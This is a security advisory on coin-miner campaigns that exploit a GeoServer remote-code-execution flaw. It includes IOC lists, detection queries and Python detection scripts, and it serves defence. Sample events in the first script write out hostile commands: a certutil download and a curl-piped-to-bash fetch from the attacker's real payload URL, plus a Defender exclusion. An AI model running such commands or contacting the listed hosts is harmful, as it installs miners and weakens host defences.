GeoServer, Where Various CoinMiner Attacks Occur

    Date: 12/30/2025

    Severity: High

    Summary

    Researchers at AhnLab (ASEC) identified multiple attack campaigns abusing CVE-2024-36401, an unauthenticated remote code execution flaw in GeoServer, to deploy cryptocurrency miners. The attackers scan the internet indiscriminately for exposed, unpatched GeoServer instances. After gaining code execution, they install XMRig-based miners that hijack the server's CPU to mine cryptocurrency for the attackers. Some campaigns rely on multi-stage PowerShell and Bash scripts, using certutil-based droppers on Windows and in-memory downloaders that avoid writing the loader to disk. To keep the miners running undetected, the attackers weaken host defenses by disabling security settings and adding Windows Defender exclusions for their payloads.
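    The tradecraft named in the summary (certutil droppers, in-memory PowerShell downloaders, Defender exclusions, XMRig arguments, and a shell spawned by the GeoServer JVM) can be turned into host-side detections independent of any single IOC. The following Python is an added example, not code from the advisory or from ASEC/Gurucul: it runs those rules over constructed process-creation events; the field names "parent", "image" and "cmdline", the file paths and the pool address are assumptions, while the two URLs are the advisory's own IOCs.

```python
"""Behavioural detections for the miner tradecraft described above.

Added example, not code from the advisory or from ASEC/Gurucul. The records
in SAMPLE_EVENTS are constructed process-creation events (Sysmon/EDR style);
the field names "parent", "image" and "cmdline" are assumptions.
"""
import re

# Command-line patterns for the techniques the summary names. Each rule is
# (name, regex); regexes are case-insensitive because attackers vary casing.
RULES = [
    # certutil used as a downloader (-urlcache -f URL) or base64 decoder (-decode)
    ("certutil_dropper",
     re.compile(r"certutil(\.exe)?\b.*(?:-urlcache\b.*-f\b|-decode\b)", re.I)),
    # PowerShell fetching code and executing it in memory (no file on disk)
    ("powershell_inmemory_download",
     re.compile(r"(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest)\b.*(iex|Invoke-Expression)\b"
                r"|(iex|Invoke-Expression)\b.*(DownloadString|Net\.WebClient)\b", re.I)),
    # Defender weakened: an exclusion added or real-time protection switched off
    ("defender_exclusion_added",
     re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I)),
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I)),
    # Linux equivalent of the dropper: download piped straight into a shell
    ("shell_pipe_to_interpreter",
     re.compile(r"(curl|wget)\b[^|;]*\|\s*(ba)?sh\b", re.I)),
    # XMRig-style miner arguments (stratum pool URL, donate level)
    ("xmrig_pool_args",
     re.compile(r"stratum\+(tcp|ssl)://|--donate-level\b", re.I)),
]

# GeoServer runs inside a JVM, so commands executed through CVE-2024-36401
# show up on the host as a shell or PowerShell whose parent process is java.
JAVA_PARENT = re.compile(r"(^|[\\/])javaw?(\.exe)?$", re.I)
INTERPRETER = re.compile(r"(^|[\\/])(cmd|powershell|pwsh|sh|bash|dash)(\.exe)?$", re.I)


def analyze_event(event):
    """Return the names of the rules one event trips (empty list = nothing)."""
    hits = [name for name, rx in RULES if rx.search(event.get("cmdline", ""))]
    if JAVA_PARENT.search(event.get("parent", "")) and INTERPRETER.search(event.get("image", "")):
        hits.append("java_spawned_interpreter")
    return hits


def analyze_events(events):
    """Return (event id, rule names) for every event that trips at least one rule."""
    return [(e["id"], hits) for e in events if (hits := analyze_event(e))]


SAMPLE_EVENTS = [  # constructed; the URLs are the advisory's IOCs, paths and pool are made up
    {"id": 1, "parent": r"C:\GeoServer\jre\bin\java.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://119.194.153.31:8080/icon/js/solrd.exe C:\Users\Public\solrd.exe"},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -nop -w hidden -c "Add-MpPreference -ExclusionPath C:\Users\Public"'},
    {"id": 3, "parent": "/usr/lib/jvm/java-17-openjdk/bin/java", "image": "/bin/sh",
     "cmdline": "sh -c 'curl -fsSL http://119.194.153.31:8080/icon/js/p.sh | bash'"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c certutil -hashfile report.pdf SHA256"},  # benign certutil use
    {"id": 5, "parent": "/bin/bash", "image": "/tmp/.x/solrd",
     "cmdline": "/tmp/.x/solrd -o stratum+tcp://pool.example:3333 -u wallet --donate-level 1"},
]

if __name__ == "__main__":
    for event_id, hits in analyze_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

    The parent-process rule is the one worth tuning first: on a GeoServer host, java spawning cmd.exe, powershell.exe or sh is rare enough to alert on by itself, and it fires before any payload name or download URL is known. Event 4 shows why the certutil rule keys on -urlcache/-decode rather than on certutil alone.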

    Indicators of Compromise (IOC) List

    Domains / URLs:

    http://119.194.153.31:8080/icon/js/config.json

    http://119.194.153.31:8080/icon/js/l.txt

    http://119.194.153.31:8080/icon/js/p.sh

    http://119.194.153.31:8080/icon/js/s.rar

    http://119.194.153.31:8080/icon/js/solrd.exe

    aaaaaaaa.cyou

    asia.aaaaaaaa.cyou

    eu.aaaaaaaa.cyou

    ssl.aaaaaaaa.cyou

    us.aaaaaaaa.cyou

    IP Addresses:

    104.243.43.115

    154.89.152.204

    185.208.156.197

    203.91.76.58

    Hashes (MD5):

    04101ba4061732ed0716f554cb7d6539

    05fe0e7e4e181ee77749f334e2d7b10f

    1136efb1a46d1f2d508162387f30dc4d

    21c5171fb746b93913efdaac328d91bd

    2517826a165193105923233e13b418d4

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "http://119.194.153.31:8080/icon/js/p.sh" or url like "http://119.194.153.31:8080/icon/js/p.sh" or siteurl like "http://119.194.153.31:8080/icon/js/p.sh" or domainname like "http://119.194.153.31:8080/icon/js/config.json" or url like "http://119.194.153.31:8080/icon/js/config.json" or siteurl like "http://119.194.153.31:8080/icon/js/config.json" or domainname like "asia.aaaaaaaa.cyou" or url like "asia.aaaaaaaa.cyou" or siteurl like "asia.aaaaaaaa.cyou" or domainname like "eu.aaaaaaaa.cyou" or url like "eu.aaaaaaaa.cyou" or siteurl like "eu.aaaaaaaa.cyou" or domainname like "http://119.194.153.31:8080/icon/js/l.txt" or url like "http://119.194.153.31:8080/icon/js/l.txt" or siteurl like "http://119.194.153.31:8080/icon/js/l.txt" or domainname like "http://119.194.153.31:8080/icon/js/solrd.exe" or url like "http://119.194.153.31:8080/icon/js/solrd.exe" or siteurl like "http://119.194.153.31:8080/icon/js/solrd.exe" or domainname like "aaaaaaaa.cyou" or url like "aaaaaaaa.cyou" or siteurl like "aaaaaaaa.cyou" or domainname like "http://119.194.153.31:8080/icon/js/s.rar" or url like "http://119.194.153.31:8080/icon/js/s.rar" or siteurl like "http://119.194.153.31:8080/icon/js/s.rar" or domainname like "ssl.aaaaaaaa.cyou" or url like "ssl.aaaaaaaa.cyou" or siteurl like "ssl.aaaaaaaa.cyou" or domainname like "us.aaaaaaaa.cyou" or url like "us.aaaaaaaa.cyou" or siteurl like "us.aaaaaaaa.cyou"

    Detection Query 2 :

    dstipaddress IN ("154.89.152.204","104.243.43.115","185.208.156.197","203.91.76.58") or srcipaddress IN ("154.89.152.204","104.243.43.115","185.208.156.197","203.91.76.58")

    Detection Query 3 :

    md5hash IN ("05fe0e7e4e181ee77749f334e2d7b10f","21c5171fb746b93913efdaac328d91bd","1136efb1a46d1f2d508162387f30dc4d","04101ba4061732ed0716f554cb7d6539","2517826a165193105923233e13b418d4")
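    Query 1 compares whole URL strings, so a request for any other path on 119.194.153.31:8080, or a DNS lookup for a subdomain of aaaaaaaa.cyou that is not on the list, would not match it. The following Python is an added example, not the advisory's queries or Gurucul code, that applies the IOC list above to sample telemetry with host-level and parent-domain matching as well as exact URL, IP and MD5 matching; the indicator values are the ones on this page, the records in SAMPLE_LOGS are constructed, and the field names (url, query, src_ip, dst_ip, md5) are assumptions.

```python
"""Match the IOCs listed above against sample telemetry.

Added example, not the advisory's own queries or Gurucul code. The indicator
values are the ones on this page; the records in SAMPLE_LOGS are constructed,
and their field names (url, query, src_ip, dst_ip, md5) are assumptions.
"""
from urllib.parse import urlsplit

IOC_URLS = {
    "http://119.194.153.31:8080/icon/js/config.json",
    "http://119.194.153.31:8080/icon/js/l.txt",
    "http://119.194.153.31:8080/icon/js/p.sh",
    "http://119.194.153.31:8080/icon/js/s.rar",
    "http://119.194.153.31:8080/icon/js/solrd.exe",
}
# The listed hostnames are one parent domain and its subdomains, so match on
# the parent: that also catches a subdomain the attackers add later.
IOC_DOMAINS = {"aaaaaaaa.cyou"}
IOC_IPS = {"104.243.43.115", "154.89.152.204", "185.208.156.197", "203.91.76.58"}
IOC_MD5 = {
    "04101ba4061732ed0716f554cb7d6539",
    "05fe0e7e4e181ee77749f334e2d7b10f",
    "1136efb1a46d1f2d508162387f30dc4d",
    "21c5171fb746b93913efdaac328d91bd",
    "2517826a165193105923233e13b418d4",
}
# The host serving the payloads is an indicator on its own: a request for any
# other path on it (which a full-URL comparison would miss) still matters.
IOC_HOSTS = IOC_IPS | {urlsplit(u).hostname for u in IOC_URLS}


def normalize_host(host):
    """Lower-case and drop a trailing dot (DNS logs often write 'example.com.')."""
    return host.lower().rstrip(".")


def in_ioc_domains(host):
    """True for the parent domain itself or any label under it."""
    return host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS)


def match_record(rec):
    """Return the sorted indicator types one normalized record matches."""
    hits = set()
    url = rec.get("url", "")
    if url in IOC_URLS:
        hits.add("url")
    # Hostnames come from a proxy URL or from a DNS query name.
    hosts = [urlsplit(url).hostname] if url else []
    hosts.append(rec.get("query"))
    for host in filter(None, hosts):
        host = normalize_host(host)
        if host in IOC_HOSTS:
            hits.add("host")
        if in_ioc_domains(host):
            hits.add("domain")
    if any(rec.get(k) in IOC_IPS for k in ("src_ip", "dst_ip")):
        hits.add("ip")
    if rec.get("md5", "").lower() in IOC_MD5:
        hits.add("md5")
    return sorted(hits)


def scan(records):
    """Map record id -> matched indicator types, for records with any match."""
    return {r["id"]: h for r in records if (h := match_record(r))}


SAMPLE_LOGS = [  # constructed records: proxy, DNS, netflow and file-hash events
    {"id": "proxy-1", "url": "http://119.194.153.31:8080/icon/js/p.sh", "dst_ip": "119.194.153.31"},
    {"id": "proxy-2", "url": "http://119.194.153.31:8080/icon/js/other.bin", "dst_ip": "119.194.153.31"},
    {"id": "dns-1", "query": "us.aaaaaaaa.cyou."},     # trailing dot, listed subdomain
    {"id": "dns-2", "query": "de.aaaaaaaa.cyou"},      # subdomain not on the list
    {"id": "flow-1", "src_ip": "10.0.0.5", "dst_ip": "185.208.156.197"},
    {"id": "file-1", "md5": "2517826A165193105923233E13B418D4"},  # upper-case hash
    {"id": "dns-3", "query": "notaaaaaaaa.cyou"},      # must not match: different domain
    {"id": "proxy-3", "url": "https://www.example.org/", "dst_ip": "203.0.113.9"},
]

if __name__ == "__main__":
    for record_id, hits in scan(SAMPLE_LOGS).items():
        print(f"{record_id}: {', '.join(hits)}")
```

    Note that 119.194.153.31 appears only inside the listed URLs, not in the IP list, so a query keyed on the IP list alone would miss connections to it; the example derives the host set from the URLs for that reason. The suffix check uses a leading dot so that notaaaaaaaa.cyou does not match.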

    Reference:

    https://asec.ahnlab.com/en/91724/


    Tags

    Vulnerability, Coin miner, CVE-2024, cryptocurrency

